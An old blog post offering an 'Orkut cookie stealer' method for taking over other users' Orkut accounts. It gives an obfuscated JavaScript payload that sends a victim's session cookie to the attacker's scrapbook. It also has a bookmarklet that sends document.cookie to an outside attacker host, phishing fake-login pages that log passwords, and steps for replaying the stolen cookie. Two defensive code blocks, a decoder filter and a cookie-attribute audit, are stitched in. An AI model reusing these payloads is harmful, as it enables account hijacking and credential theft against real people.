Wednesday, November 3, 2010

Orkut Cookie Stealer Method (Hack Orkut ID's)

1] What are cookies?

A:- Cookies are text messages/files given to a web browser by web servers. The main purpose of a cookie is to identify users and possibly prepare customized web pages, or to save site login information for you. When you enter a web site that uses cookies, you may be asked to fill out a form providing information such as your name, email address, etc. This information is packaged into a cookie and sent to your web browser, which stores it for later use. The next time you go to the same web site, your browser sends the cookie to the web server. The cookie is then sent back to the server each time the browser requests a page from that server.

A web server has no memory, so the website you are visiting transfers a cookie file that the browser stores on your computer's hard disk, so that the web site can remember who you are and your preferences. This message exchange allows the web server to use this information to present you with customized web pages.

Types of Cookies:


[a] Session cookie:
It is also called a transient cookie. It is a cookie that is erased when you close the web browser. Session cookies are stored in temporary memory and are not retained after the browser is closed. Session cookies do not collect information from your computer. They typically store information in the form of a session identification that does not personally identify the user.

[b] Persistent cookie:
It is also called a permanent cookie: a cookie that is stored on your hard drive until it expires (persistent cookies are set with expiration dates) or until you delete it. Persistent cookies are used to collect identifying information about the user, such as web surfing behavior or preferences for a specific web site.



Orkut cookie stealing script

Requirements:-

1]Firefox
2]Add and edit cookie addon[cookie editor]:- https://addons.mozilla.org/firefox/addon/573

Instructions:

1] First of all, make a fake account for better understanding. Now we will hack the fake profile from the real profile.
2] You will need the GID of the fake profile/victim profile, so use the following cookie stealing script.
3] In order to get the GID, go to your fake account's/victim's homepage, paste this script in the address bar and hit Enter. You will see the GID in the box.

Code: 


javascript:sri=document.all[0].innerHTML.match(/[0-9]*.jpg\)/g);sri=parseInt(sri);alert(sri);void(0)

Other ways to find GID:
Method 2
->Go to any profile
->Right click and select view page source
->Now press Ctrl+F[Find] and type in it "background-image"
->It will point out to this line which resembles the below line
background-image: url(http://img3.orkut.com/images/medium/1234567/88358457.jpg);

The red part is your Gid


Method 3

Go to the victim's home page/fake profile, then right click on the display picture and choose Copy Image Location. You will then get a URL that resembles the one given below:

http://img3.orkut.com/images/medium/1234567/88358457.jpg

The red part is your Gid


Now suppose your GID is 2541021 then your cookie stealing script will be like this

Code:java script:orkut=replyForm;orkut.toUserId.value=2541021;orkut.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));orkut.action=Scrapbook.aspx?Action.submit;orkut.submit();i=0;a=document.links;setInterval(i++;a[i %document.links.length].style.color=c[i%c.length],10);void(0);
Now, do you see those numbers in the script? Let's see what they mean as ASCII codes:

100,D
111,O
99,C
117,U
109,M
101,E
110,N
116,T
46,.
99,C
111,O
111,O
107,K
105,I
101,E

Still remember the example from my above post? This is how you read the content of a cookie: var theCookie = "" + document.cookie;

eval() is a function that will execute the code represented by the string, which in this case is masked behind the numbers.

Quite clever, but the first time I have seen tricks like this. I can already imagine how Orkut solved the first problem previously. They just forbade the string "document.cookie" in users' code, which solved the problem at first, but obviously that doesn't solve this issue.

So again, this is not a bug within Firefox; it is normal JavaScript code, and Firefox executes it just the way it is expected to be executed.

If there is a security bug somewhere in ., it is either in the specifications of the Javascript or at the orkut website.
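Why forbidding the literal string "document.cookie" did not help, shown from the reviewer's side as an added example (not code from the original post or from Orkut). The function names are hypothetical, and the only input is the character-code expression already quoted above.

```javascript
// Added example: hypothetical helper names; the expression is the one on this page.
const SCRAP_FROM_PAGE =
  "orkut.scrapText.value=eval(String.fromCharCode(" +
  "100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));";

// The filter the text describes: reject input containing the literal string.
function naiveFilter(text) {
  return text.includes("document.cookie");
}

// Statically rewrite String.fromCharCode(n, n, ...) into the string literal it
// would produce. Nothing is evaluated; only decimal literals are decoded.
function decodeCharCodes(text) {
  const call =
    /String\s*\.\s*fromCharCode\s*\(\s*((?:\d{1,7}\s*,\s*)*\d{1,7})\s*\)/g;
  return text.replace(call, (_, args) => {
    const codes = args.split(",").map((n) => Number(n.trim()));
    return JSON.stringify(String.fromCharCode(...codes));
  });
}

// Triage helper: what a reviewer sees for one submitted message.
function inspect(text) {
  const decoded = decodeCharCodes(text);
  return {
    caughtByNaiveFilter: naiveFilter(text),
    caughtAfterDecoding: naiveFilter(decoded),
    usesEval: /\beval\s*\(/.test(text),
    decoded,
  };
}

console.log(inspect(SCRAP_FROM_PAGE));
```

Decoding one encoding does not make a blocklist complete; the durable control is a session cookie that page script cannot read at all.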


Ok now 

Scrap this to victim and tell him/her to run it in the address bar, as soon as he/she runs the script you will get a cookie info into your fake account.

Now go to the fake account and copy the cookie from "ORKUTPREF=ID=.."onwards till end.
The victim's cookie which will come to your Scrapbook will look like this.
__utmz=85cn=(direct)|utmcsr=(direct)|utmcmd=(none); orkut_state=ORKUTPREF=ID=407231863351044LNG=UI6qeIbfO5hrrk=:; TZ=-330; __utma=575.1909575



Now go to
Tools>>cookie editor>> See the orkut+state Id and click on edit

Go to Tools-->Cookies Editor ---> select Add
http://www.orkut.co.in/AlbumZoom.aspx?uid=13758045739414020276&pid=1218191708969&aid=1

Fill Name : orkut_state

Contents : Fill in the cookies here

Host : .www.orkut.co.in


Then click save
Paste the whole cookie you copied, in the content.Click on save and close it.Just refresh it.Now you will be in victims account.You can notice that you have logged in victims id after you click on refresh.
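The replay above works because orkut_state is a bearer credential that page script can read and any browser can present. As an added example (not from the original post or from Orkut; the header values and the SESSION_COOKIES list are constructed assumptions), this audit flags session cookies whose Set-Cookie attributes leave them exposed:

```javascript
// Added example: header values are constructed, not captured from Orkut.
const SAMPLE_SET_COOKIE = [
  "orkut_state=ORKUTPREF=ID=0000:LNG=en; Path=/; Domain=.example.test",
  "orkut_state=ORKUTPREF=ID=0000:LNG=en; Path=/; Secure; HttpOnly; SameSite=Lax",
  "TZ=-330; Path=/",
];

// Cookie names treated as session credentials (assumption for this example).
const SESSION_COOKIES = new Set(["orkut_state"]);

// Parse one Set-Cookie header into { name, value, attrs }.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(";");
  const eq = pair.indexOf("=");
  const attrs = new Map();
  for (const part of rest) {
    const [k, ...v] = part.trim().split("=");
    if (k) attrs.set(k.toLowerCase(), v.join("="));
  }
  const name = eq < 0 ? "" : pair.slice(0, eq).trim();
  return { name, value: pair.slice(eq + 1).trim(), attrs };
}

// List the ways a session cookie is exposed; other cookies get no findings.
function auditCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!SESSION_COOKIES.has(c.name)) return { name: c.name, findings };
  if (!c.attrs.has("httponly"))
    findings.push("readable via document.cookie (no HttpOnly)");
  if (!c.attrs.has("secure"))
    findings.push("sent over plain HTTP (no Secure)");
  if (!c.attrs.has("samesite"))
    findings.push("no SameSite attribute");
  return { name: c.name, findings };
}

function auditAll(headers) {
  return headers.map(auditCookie);
}

console.log(JSON.stringify(auditAll(SAMPLE_SET_COOKIE), null, 2));
```

HttpOnly keeps the cookie out of document.cookie; it does not stop a value that has already leaked from being replayed, which is why sensitive actions should still require the current password.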

Other ways to obtain cookies:

1]Using Cookie Monster 

You can also use a cookie monster and make the ultimate cookie exploit to hack Orkut. Let's start.


1.Go to Lenhost.info . Make a free Hosting account .

2.It will mail you all the details as ftp / My Sql username and password

3. Download Install.php from here

http://rapidshare.com/files/53318259/install.php

4. Upload this file on the server and run .

5 . It will Open as : a Installer

6. Fill the Coloums :

Database : its something like username_name

For this go to mysql and make a database there .

Password : Your Password

User : sent to u by mail

Table : Give any name in this column

Server : This is found in mysql

Admin Password : Provide a pass to access admin area

Once you are done select Submit .

7. Next page in the end show u some links get the 4th link

8.javascript:document.location='http://orkut.lenhost.info/getmonster.php?cookie='+encodeURIComponent(document.cookie);void(0)

Replace My link wid urs in the above javascript.

9. Done send it to your victim when victim runs this his cookies gets stolen

10. Receiving cookies open admin area http://name.lenhost.info/logmonster.php it asks for the pass login with the pass you provided during installation.


2]Using Cookie Stealer In Fake Page

Use This Run.php File In Fake Page

http://www.freeuploading.com/files/_5JDnx1/run_php.php

And The Cookie And Login Details Will BE Saved In ld.txt

Copy the whole source code of the Login Page Of Orkut.Paste In Notepad

Search for "https://www.google.com/accounts/ServiceLoginAuth?service=orkut" in the fake login page and Replace with Run.php

And Change Method From File to get the Login details

Now Upload This two files to x10hosting server as its best

and send the link to victim

His Cookie And Login Details Will Saved In

http://ur-username.x10hosting.com/ld.txt

means in ld.txt

Upload google_transperant.gif also which u can save from login page ///

For Fake login pages Download This

http://www.freeuploading.com/files/BgtnoVK/cookie_rar.php

Now Just Upload This 3 files in your account of x10hosting

Now Send This type of link to victim

http://example.x10hosting.com/orkut.html

ok when he will do login in this page u will get the details means cookie and login detail (username and password)

in this file

http://example.x10hosting.com/ld.txt

Enjoy !!!


Note:You can only login into others accounts using the cookies.You can't change the password/perform transfer of ownership of communities on orkut because they require old password to do so.

For more information plz refer to the following topics in the community
 